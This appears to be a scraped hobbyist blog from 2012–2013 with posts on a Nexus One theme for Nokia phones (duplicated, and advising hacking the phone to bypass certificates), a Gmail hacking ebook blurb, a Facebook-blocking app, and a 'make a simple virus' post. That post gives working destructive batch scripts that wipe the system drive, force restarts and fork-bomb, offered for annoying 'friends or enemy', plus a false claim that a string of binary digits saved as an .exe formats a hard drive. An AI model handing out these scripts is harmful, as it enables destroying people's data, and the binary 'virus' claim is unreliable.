Friday, 9 August 2013
Sunday, 20 January 2013
Android 2.1 For Nokia
First review only a video. Now you can download it.
Thanks to Hacker for creating HTC Sense Ui for Nokia 5800.
Nexus One Android 2.1 Ui
(Used it on Nokia 5230)
Good:
- NEW! Tap on the Top icon messenger black icon and it will go to Notifications Bar home screen.
- Icon 72x72 for Thumb size (without using stylus pen to operate).
(In this video is difficult to hold camera while playing the phone)
- Google search Widget actually going to Opera Mobile 10 beta.
- 5 Different home screen (1800x460 wallpaper).
- Nexus One Launcher Grid and Home icon.
- Add your shortcut on Home Screen or Launcher by enable the gdesk menu (Fav icon).
Bad:
- The weather widget not functional.
- The notes always goes to original.
- Double tap / single tap for click.
- The apps of gDesk has little bug (crashing when fast rotating).
DOWNLOAD gDesk v0.33g
DOWNLOAD Nexus One gdd file.
DOWNLOAD Nexus One.Ui Source file icon, Home Screen and Wallpapers.
Instruction:- Download all the files above. (3 Downloads files).
- Extract all the file and save into your memory card. Example: d:/apps/gDesk
should have this sis file:
GDesk.0.33G.SISGDeskAgnViewS60.0.33g.SISGDeskClockS60.0.33g.SISGDeskInfoViewS60.0.33g.SISGDeskNotepadS60.0.33g.SISGDeskShortcutS60.0.33g.SIS (optional to install)GDeskTaskManS60.0.33g.SIS
- Create new folder d:/apps/gdesk/GDD File
put Nexus One.gdd
- Install all the SIS file. (It better to hack your phone to bypass the certificate)
- After finishing install. Open gDesk and tap on the screen choose design.
- Tap again on the screen and choose load design.
- Find where you put the gdd file.
- Your done.
- If you have missing skin. Put the Nexus One.Ui Source file icon, Home Screen and Wallpapers. into d:/+GDesk/
folder Home Screen.
folder Icon.
folder Wallpapers.
Recommended:
- After load the design.
-Tap on the screen and choose option tuk tick this option:
Replace Main
Full Screen
Left soft key: close
Hide title caption
Disable menu tap.
Information:
You can easily to turn back into Nokia Ui.
You can turn off the gDesk. (It just replace the home screen not fully replace the system Ui)
Thanks to Hacker for creating HTC Sense Ui for Nokia 5800.
Nexus One Android 2.1 Ui
(Used it on Nokia 5230)
Good:
- NEW! Tap on the Top icon messenger black icon and it will go to Notifications Bar home screen.
- Icon 72x72 for Thumb size (without using stylus pen to operate).
(In this video is difficult to hold camera while playing the phone)
- Google search Widget actually going to Opera Mobile 10 beta.
- 5 Different home screen (1800x460 wallpaper).
- Nexus One Launcher Grid and Home icon.
- Add your shortcut on Home Screen or Launcher by enable the gdesk menu (Fav icon).
Bad:
- The weather widget not functional.
- The notes always goes to original.
- Double tap / single tap for click.
- The apps of gDesk has little bug (crashing when fast rotating).
DOWNLOAD gDesk v0.33g
DOWNLOAD Nexus One gdd file.
DOWNLOAD Nexus One.Ui Source file icon, Home Screen and Wallpapers.
This Nexus One Ui gdd for gDesk is created by me Muffler and modify files source from TommyHacker. Spread the word... :)
Instruction:- Download all the files above. (3 Downloads files).
- Extract all the file and save into your memory card. Example: d:/apps/gDesk
should have this sis file:
GDesk.0.33G.SISGDeskAgnViewS60.0.33g.SISGDeskClockS60.0.33g.SISGDeskInfoViewS60.0.33g.SISGDeskNotepadS60.0.33g.SISGDeskShortcutS60.0.33g.SIS (optional to install)GDeskTaskManS60.0.33g.SIS
- Create new folder d:/apps/gdesk/GDD File
put Nexus One.gdd
- Install all the SIS file. (It better to hack your phone to bypass the certificate)
- After finishing install. Open gDesk and tap on the screen choose design.
- Tap again on the screen and choose load design.
- Find where you put the gdd file.
- Your done.
- If you have missing skin. Put the Nexus One.Ui Source file icon, Home Screen and Wallpapers. into d:/+GDesk/
folder Home Screen.
folder Icon.
folder Wallpapers.
Recommended:
- After load the design.
-Tap on the screen and choose option tuk tick this option:
Replace Main
Full Screen
Left soft key: close
Hide title caption
Disable menu tap.
Information:
You can easily to turn back into Nokia Ui.
You can turn off the gDesk. (It just replace the home screen not fully replace the system Ui)
Saturday, 11 August 2012
Thursday, 26 July 2012
Hacking Gmail Ebook
- The first book to unlock the true power behind Gmail, Hacking Gmail will immediately appeal to Google and Gmail fans
- This is serious, down-and-dirty, under-the-hood, code-level hacking that will have readers eliminating the default settings, customizing appearance, disabling advertising, and taking control over their Gmail accounts
- Covers turning Gmail into an online hard drive for backing up files, using it as a blogging tool, and even creating customized Gmail tools and hacks
- Shows readers how to check their Gmail without visiting the site; use Gmail APIs in Perl, Python, PHP, and other languages, or create their own; and maximize Gmail as a host for message boards, photo galleries, even a blog
Monday, 23 July 2012
Tricks to make Simple Virus
There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick :
1) Open Notepad
2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make :
a) To Delete all the Content of a Drive use this Code :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
b) To Crush the Windows use this Code :
@Echo off
Del C:\ *.* y
c) To make Computer Restart simultaneously use this Code :
@echo off shutdown -r -f -t 00
d) To make Fork Virus to open many Command Prompts use this Code :
start
%0
goto :s
3) Now Save these Files with any desired name with .bat extention.
4) Don't Run these Files on Your own Computer otherwise the Result you already know.
So these are simple Tricks to make Simple Virus.
Trick to make a Virus which can Format and Destroy Hard Drive
There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below :
1) Open Notepad.
2) Copy and Paste the given Code into Notepad :
01001011000111110010010101010101010000011111100000
3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.
So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive
How To Completely Block Facebook On Computer: FB Limiter
FB Limiter is a windows application that can completely restrict access to facebook and Youtube on your computer.It is available in both free and paid versions.The Free version allows only complete blocking of youtube and facebook whereas in paid version you will have the ablity to block or unblock these sites for specific interval of time.
Features Of FB Limiter
- Block facebook and youtube access on your computer to anyone who uses it (Normal Lock)
- Limit facebook and youtube access to specific times during the week (e.g. Allow your kids to use facebook only one hour a day) (Time Lock - Pro version)
- Block facebook and youtube access to yourself for specific time duration. In cases when you are too much distracted and want to be sure you will not get a chance to use facebook or youtube. (Total Lock - Pro version)
- Control access to facebook on daily basis. (e.g. You could limit usage of facebook to just one hour daily) (Duration Lock - Pro version)
How To use Fb Limiter?
Grab your free copy of FB limiter by clicking here.Install and run the software on your computer.You will need to register for a free account to unlock the software.Once registered you will be greeted by a friendly user Interface
Now you can block these website on a single click of mouse.
Another great feature of this softwae is that it is password protected.Even if somebody know that you are blocking websites using FB limiter still they won’t be able to unblock them as the software will ask for a password before it can be used.
This software is compatible with windows xp service pack 2 and later.So test out this software and share you experience via comments
Subscribe to:
Comments (Atom)



















